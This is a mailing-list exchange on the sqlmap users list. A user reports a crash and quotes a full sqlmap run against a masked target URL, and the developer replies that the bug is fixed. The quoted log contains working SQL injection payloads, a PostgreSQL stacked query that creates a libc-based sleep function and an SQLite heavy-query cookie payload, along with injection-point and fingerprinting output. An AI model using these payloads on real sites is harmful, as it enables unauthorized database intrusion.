Re: [sqlmap-users] New Error
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] New Error
|
From: Miroslav S. <mir...@gm...> - 2010-12-17 07:48:39
|
thx a lot nightman. find it fixed in the latest revision from SVN repository. kr On Fri, Dec 17, 2010 at 7:34 AM, <nig...@em...> wrote: > sqlmap -u "http://xxxxxx.xxx/html.php?Html_showFile=rss&app_state=4f25b469f81cab0f&xxx=1" -o -a C:\pentest\sqlmap.0.9\txt\user-agents.txt --level 5 --risk 3 -f -b > [03:44:42] [INFO] testing connection to the target url > [03:44:52] [INFO] testing NULL connection to the target url > [03:44:57] [INFO] testing if the url is stable, wait a few seconds > [03:45:00] [INFO] url is stable > all the tests.... > > Cookie parameter 'app_state' is vulnerable. Do you want to keep testing the others? [y/N] y > sqlmap identified the following injection points with 10051 HTTP(s) requests: > --- > Place: GET > Parameter: xxx > Type: stacked queries > Title: PostgreSQL < 8.2 stacked queries (Glibc) > Payload: Html_showFile=rss&app_state=4f25b469f81cab0f&xxx=1))); CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS CHR(47)| > |CHR(108)||CHR(105)||CHR(98)||CHR(47)||CHR(108)||CHR(105)||CHR(98)||CHR(99)||CHR(46)||CHR(115)||CHR(111)||CHR(46)||CHR(54), CHR(11 > 5)||CHR(108)||CHR(101)||CHR(101)||CHR(112) language CHR(67) STRICT; SELECT sleep(5);-- AND (((6808=6808 > > Place: Cookie > Parameter: app_state > Type: stacked queries > Title: SQLite > 2.0 stacked queries (heavy query) > Payload: app_state=4f25b469f81cab0f'); SELECT LIKE(X'41'||X'42'||X'43'||X'44'||X'45'||X'46'||X'47', UPPER(HEX(RANDOMBLOB(50000 > 000))));-- AND ('eLhg' LIKE 'eLhg;frw_test_cookie=1 > --- > > there were multiple injection points, please select the one to use for following injections: > [0] place: GET, parameter: xxx, type: Unescaped numeric (default) > [1] place: Cookie, parameter: app_state, type: LIKE single quoted string > [q] Quit >> 0 > [07:24:11] [INFO] testing PostgreSQL > [07:24:12] [WARNING] the back-end DBMS is not PostgreSQL > [07:24:12] [INFO] testing MySQL > [07:24:12] [WARNING] the back-end DBMS is not MySQL > [07:24:12] [INFO] testing Oracle > [07:24:12] [WARNING] the back-end DBMS is not Oracle > [07:24:12] [INFO] testing Microsoft SQL Server > [07:24:13] [WARNING] the back-end DBMS is not Microsoft SQL Server > [07:24:13] [INFO] the back-end DBMS is SQLite > [07:24:13] [INFO] fetching banner > [07:24:13] [INFO] retrieving the length of query output > [07:24:13] [INFO] retrieved: > [07:24:16] [INFO] retrieved: > [07:24:19] [INFO] testing SQLite > [07:24:20] [WARNING] the back-end DBMS is not SQLite > [07:24:20] [INFO] testing Microsoft Access > [07:24:21] [WARNING] the back-end DBMS is not Microsoft Access > [07:24:21] [INFO] testing Firebird > [07:24:21] [WARNING] the back-end DBMS is not Firebird > [07:24:21] [INFO] testing SAP MaxDB > [07:24:22] [WARNING] the back-end DBMS is not SAP MaxDB > [07:24:22] [INFO] testing Sybase > [07:24:22] [WARNING] the back-end DBMS is not Sybase > > [07:24:22] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversio > n repository. If the exception persists, please send by e-mail to sql...@li... the command line, the followi > ng text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get > back to you. > sqlmap version: 0.9-dev > Python version: 2.6.5 > Operating system: nt > Traceback (most recent call last): > File "C:\pentest\sqlmap.0.9\sqlmap.py", line 79, in main > start() > File "C:\pentest\sqlmap.0.9\lib\controller\controller.py", line 393, in start > action() > File "C:\pentest\sqlmap.0.9\lib\controller\action.py", line 57, in action > dataToStdout("%s\n" % conf.dbmsHandler.getFingerprint()) > AttributeError: 'NoneType' object has no attribute 'getFingerprint' > > [*] shutting down at: 07:24:22 > > ------------------------------------------------------------------------------ > Lotusphere 2011 > Register now for Lotusphere 2011 and learn how > to connect the dots, take your collaborative environment > to the next level, and enter the era of Social Business. > http://p.sf.net/sfu/lotusphere-d2d > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
